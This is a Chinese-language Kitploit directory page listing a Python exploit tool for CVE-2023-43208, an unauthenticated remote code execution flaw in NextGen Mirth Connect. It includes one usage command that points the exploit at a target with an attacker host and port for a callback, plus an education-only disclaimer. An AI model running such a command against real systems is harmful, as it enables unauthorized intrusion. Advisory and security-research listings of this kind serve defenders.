Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Mirth-Connect-CVE-2023-43208 — Python 实现的 CVE-2023-43208 Mirth Connect RCE(未授权 XStream) | Kitploit
工具/GitHubGitHub/azrvs/mirth-connect-cve-2023-43208
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队
GitHubazrvs/mirth-connect-cve-2023-43208

Mirth-Connect-CVE-2023-43208

Python 实现的 CVE-2023-43208 Mirth Connect RCE(未授权 XStream)

查看仓库
26个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-43208:NextGen Mirth Connect 中的未认证远程代码执行(RCE)

Python Version Vulnerability

该漏洞利用工具利用了 Mirth Connect 的 XStream 引擎中的一个严重反序列化漏洞。它源于 CVE-2023-37679 的不完整补丁,可在所有 4.4.1 之前的版本中实现未认证的任意代码执行。

使用方法

root@kitploit:~
python3 mirth_rce.py https://{target} <attacker_host> <attacker_port>

免责声明

此漏洞利用脚本严格用于教育目的和经授权的安全审计,以帮助防御者缓解 CVE-2023-43208;任何针对未授权目标使用此工具的行为均属违法,且由最终用户自行承担全部责任。作者按“原样”提供本软件,不作任何担保,不承担因潜在滥用或损害而产生的任何责任,且不认可或鼓励任何未经授权的活动。请自行承担使用风险,并仅在遵守适用法律的前提下使用。

下载工具